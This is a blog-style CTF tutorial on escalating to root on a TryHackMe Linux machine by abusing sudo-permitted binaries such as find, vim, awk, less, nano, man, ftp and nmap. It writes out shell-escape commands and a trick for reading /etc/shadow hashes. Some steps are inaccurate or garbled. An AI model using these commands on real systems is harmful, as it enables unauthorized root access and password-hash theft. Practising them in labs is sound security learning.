PRIVILEGE ESCALATION SERIES 2 CTF
WELCOME TO TAMILCODE
HERE IS TRICKS AND TECHNOLOGY
So in this website, we going to see about privilege escalation in sudo binary abuse and what is sudo? and how escalated the privilege in Linux (try hack me)...so Let get started...
So first what is sudo?
Sudo is nothing but it is a superuser do and basically, sudo was used to change privilege from the user and root.
Nowadays the Linux os is modified in the best way... you can look at 2020 which separated the privilege one is user and root.
user has only low privilege and root has high privilege.
And you are able to run the sudo command instead of the password only...
sudoer syntax
root ALL=(ALL: ALL) ALL
you can able see the below image
So now we going to abuse the sudo binary in Try hack me machine
STEP 1: sudo -l
it will list some executable which is shown in below image
You are able to see that it has the root privilege but no password.
It means you can run the binary without the password. now we going to abuse this.
Let I going say only the possibility of changing the user to root privilege is not a solution for any try hack my machines.
So first iftop.
TIPS: if you want to abuse the binary you need to know what is it mean?
Now, what is iftop?
Iftop is nothing but it is bandwidth and you can able to find the internal network usage and you exit by clicking the control + q. basically, it was executed in root permission only.
STEP 2: sudo /usr/sbin/iftop
STEP 3: sh or bash
Now you can able to get the root shell.
So next we going to abuse the find command
What is find?
find is nothing but it is a Linux command which is used to find the directory or file in a Linux machine. so now we going to abuse the find command
STEP 4: sudo find . -name tools -exec whoami \;
Now it will show that root.
STEP 5: sudo find . -name tools -exec /bin/sh \;
Now you get the root shell.
you can get bash shell also using the below command
STEP 6: sudo find . -name tools -exec /bin/bash \;
Now can able to get the bash shell in it.
So next we going to abuse the nano
What is nano?
Nano is nothing but is a user-friendly text editor and you can edit any in the Linux system. so now we going to abuse the nano editor.
STEP 7: sudo nano
Now the editor will be opened click the control + r to read the file and click control + x to execute the system command you can able to see the below image.
STEP 8: reset; /bin/sh 1>&0 2>&0
after executing the command you will be able to get the shell in this and give the reset command for the proper shell.
So next we going to abuse the vim
What is vim?
VIM is a text editor you edit the file in vim but it is not user friendly.
STEP 9: sudo /usr/bin/vim
now you will enter into the editor
STEP 10: :! /bin/sh
Now you get the root shell.
So next we going to abuse the man command
What is man?
Man is nothing but if want to read the page manually you use this command.
STEP 11: sudo /usr/bin/man whoami
Now you get the manual page of whoami and use the below command to abuse
STEP 12: ! /bin/sh or ! /bin/bash
So now you get the root shell.
So next we going to abuse the awk command
What is awk?
Awk is nothing but it is a programming language like python. In this awk, you can able use the system command.
STEP 13: sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}'
Now can able get the root shell using awk.
So next we going to abuse the less command
Less is also like a vim editor
STEP 14: sudo /usr/bin/less
Now you less will be opened
STEP 15: ! /bin/sh or ! /bin/bash
Now you will be able to get the root shell.
So next we going to abuse the ftp
What is FTP?
FTP is nothing but it is a service like an SSH and you can able to transfer the file through the FTP service.
STEP 16: sudo ftp
STEP 17: ! /bin/sh or ! /bin/bash
Now you can able to get the root shell
So next we going to abuse the nmap
What is namp?
nmap is nothing but it is a port scanning tool. and it has been used to find the service, port, etc.
STEP 18: nmap --interactive
STEP 19: ! /bin/sh or ! /bin/bash
So next we going to abuse the apache2
What is apache2?
apache2 is nothing but it is a server and you can able to host the website locally.
STEP 20: /usr/sbin/apache -f /etc/shadow
Now can able get the password in the hash.
So next we going to abuse the more command
STEP 21: /bin/more
STEP 22: ! /bin/sh or ! /bin/bash
I hope you will understand this article please subscribe my website and please support us by donating using the below link
Post a Comment